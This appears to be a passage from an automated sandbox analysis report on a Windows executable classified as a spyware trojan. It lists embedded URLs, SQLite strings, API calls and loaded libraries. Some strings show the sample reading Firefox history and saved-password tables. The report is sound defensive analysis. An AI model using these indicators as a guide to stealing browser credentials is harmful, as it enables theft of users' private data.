Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, file.exe, 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.1650074665.000000001D861000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1666695597.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: file.exe, 00000000.00000003.1496503390.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, IDAAFBGD.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000002.1661273671.0000000029932000.00000004.00000020.00020000.00000000.sdmp, AKEGDHJDHDAFHJJKJEHC.0.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
Source: file.exe, 00000000.00000002.1661273671.0000000029932000.00000004.00000020.00020000.00000000.sdmp, AKEGDHJDHDAFHJJKJEHC.0.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
Source: file.exe, 00000000.00000003.1496503390.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, IDAAFBGD.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.1496503390.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, IDAAFBGD.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.1496503390.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, IDAAFBGD.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000002.1661273671.0000000029932000.00000004.00000020.00020000.00000000.sdmp, AKEGDHJDHDAFHJJKJEHC.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: file.exe, 00000000.00000002.1661273671.0000000029932000.00000004.00000020.00020000.00000000.sdmp, AKEGDHJDHDAFHJJKJEHC.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000003.1496503390.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, IDAAFBGD.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.1496503390.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, IDAAFBGD.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.1496503390.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, IDAAFBGD.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: AKEGDHJDHDAFHJJKJEHC.0.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://mozilla.org0/
Source: CAKKKFBFIDGDBFHJJEHIDHDAAF.0.dr	String found in binary or memory: https://support.mozilla.org
Source: CAKKKFBFIDGDBFHJJEHIDHDAAF.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: CAKKKFBFIDGDBFHJJEHIDHDAAF.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6l
Source: file.exe, 00000000.00000002.1661273671.0000000029932000.00000004.00000020.00020000.00000000.sdmp, AKEGDHJDHDAFHJJKJEHC.0.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: file.exe, 00000000.00000003.1496503390.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, IDAAFBGD.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000003.1496503390.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, IDAAFBGD.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: file.exe, 00000000.00000002.1661273671.0000000029932000.00000004.00000020.00020000.00000000.sdmp, AKEGDHJDHDAFHJJKJEHC.0.dr	String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: CAKKKFBFIDGDBFHJJEHIDHDAAF.0.dr	String found in binary or memory: https://www.mozilla.org
Source: CAKKKFBFIDGDBFHJJEHIDHDAAF.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
Source: CAKKKFBFIDGDBFHJJEHIDHDAAF.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
Source: CAKKKFBFIDGDBFHJJEHIDHDAAF.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000003.1589811279.000000002F9A0000.00000004.00000020.00020000.00000000.sdmp, CAKKKFBFIDGDBFHJJEHIDHDAAF.0.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Contains functionality to call native functions

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBFB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6CBFB700
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBFB8C0 rand_s,NtQueryVirtualMemory,	0_2_6CBFB8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBFB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	0_2_6CBFB910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB9F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6CB9F280

Detected potential crypto function

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ACF0EF	0_2_00ACF0EF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2D8C0	0_2_00B2D8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B28921	0_2_00B28921
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AB6909	0_2_00AB6909
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B312CE	0_2_00B312CE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2527B	0_2_00B2527B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A2727D	0_2_00A2727D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A4E3FA	0_2_00A4E3FA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2F3CB	0_2_00B2F3CB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B39337	0_2_00B39337
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B344FE	0_2_00B344FE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C4742E	0_2_00C4742E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B26DBB	0_2_00B26DBB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B35D31	0_2_00B35D31
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2BEA5	0_2_00B2BEA5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A8BEC1	0_2_00A8BEC1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B37E15	0_2_00B37E15
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB935A0	0_2_6CB935A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBF34A0	0_2_6CBF34A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBFC4A0	0_2_6CBFC4A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBA6C80	0_2_6CBA6C80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBD6CF0	0_2_6CBD6CF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB9D4E0	0_2_6CB9D4E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBBD4D0	0_2_6CBBD4D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBA64C0	0_2_6CBA64C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC0545C	0_2_6CC0545C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBD5C10	0_2_6CBD5C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBE2C10	0_2_6CBE2C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC0AC00	0_2_6CC0AC00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC0542B	0_2_6CC0542B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBA5440	0_2_6CBA5440
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBF85F0	0_2_6CBF85F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBD0DD0	0_2_6CBD0DD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBBED10	0_2_6CBBED10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBC0512	0_2_6CBC0512
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBAFD00	0_2_6CBAFD00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBF4EA0	0_2_6CBF4EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC076E3	0_2_6CC076E3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBB5E90	0_2_6CBB5E90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBFE680	0_2_6CBFE680
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB9BEF0	0_2_6CB9BEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBAFEF0	0_2_6CBAFEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBF9E30	0_2_6CBF9E30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC06E63	0_2_6CC06E63
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBD7E10	0_2_6CBD7E10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBE5600	0_2_6CBE5600
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB9C670	0_2_6CB9C670
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBB9E50	0_2_6CBB9E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBD3E50	0_2_6CBD3E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBE2E4E	0_2_6CBE2E4E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBB4640	0_2_6CBB4640
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBE77A0	0_2_6CBE77A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBC6FF0	0_2_6CBC6FF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB9DFE0	0_2_6CB9DFE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBD7710	0_2_6CBD7710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBA9F00	0_2_6CBA9F00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC050C7	0_2_6CC050C7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBC60A0	0_2_6CBC60A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBBC0E0	0_2_6CBBC0E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBD58E0	0_2_6CBD58E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBDB820	0_2_6CBDB820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBE4820	0_2_6CBE4820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBA7810	0_2_6CBA7810
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBDF070	0_2_6CBDF070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBB8850	0_2_6CBB8850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBBD850	0_2_6CBBD850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBCD9B0	0_2_6CBCD9B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB9C9A0	0_2_6CB9C9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBD5190	0_2_6CBD5190
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBF2990	0_2_6CBF2990
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC0B170	0_2_6CC0B170
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBEB970	0_2_6CBEB970
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBAD960	0_2_6CBAD960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBBA940	0_2_6CBBA940
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBACAB0	0_2_6CBACAB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB922A0	0_2_6CB922A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBC4AA0	0_2_6CBC4AA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBB1AF0	0_2_6CBB1AF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBDE2F0	0_2_6CBDE2F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC0BA90	0_2_6CC0BA90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC02AB0	0_2_6CC02AB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBD8AC0	0_2_6CBD8AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBD9A60	0_2_6CBD9A60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC053C8	0_2_6CC053C8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB9F380	0_2_6CB9F380
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBDD320	0_2_6CBDD320
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBAC370	0_2_6CBAC370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB95340	0_2_6CB95340

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 007645C0 appears 316 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CBD94D0 appears 90 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CBCCBE8 appears 134 times

Sample file is different than original file name gathered from version info

Source: file.exe, 00000000.00000002.1667191321.000000006CE15000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Source: file.exe, 00000000.00000002.1666905058.000000006CC22000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: exbnbhbd ZLIB complexity 0.9948048289453832

Source: file.exe

Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/23@0/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CBF7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

0_2_6CBF7030

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00779600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00779600

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00773720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

0_2_00773720

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\J6VYLJQS.htm

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.1667089249.000000006CDCF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1650074665.000000001D861000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1666607316.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.1667089249.000000006CDCF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1650074665.000000001D861000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1666607316.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.1667089249.000000006CDCF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1650074665.000000001D861000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1666607316.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.1667089249.000000006CDCF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1650074665.000000001D861000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1666607316.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, 00000000.00000002.1667089249.000000006CDCF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1650074665.000000001D861000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1666607316.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.1667089249.000000006CDCF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1650074665.000000001D861000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1666607316.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: file.exe, 00000000.00000002.1650074665.000000001D861000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1666607316.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.1638110314.000000000123E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT url FROM moz_places LIMIT 1000f;q
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000003.1510103828.000000001D780000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1496044503.000000001D764000.00000004.00000020.00020000.00000000.sdmp, AKKKFBGDHJKFHJJJJDGC.0.dr, AFCBFIJEHDHCBGDGDGCB.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.1650074665.000000001D861000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1666607316.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.1650074665.000000001D861000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1666607316.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
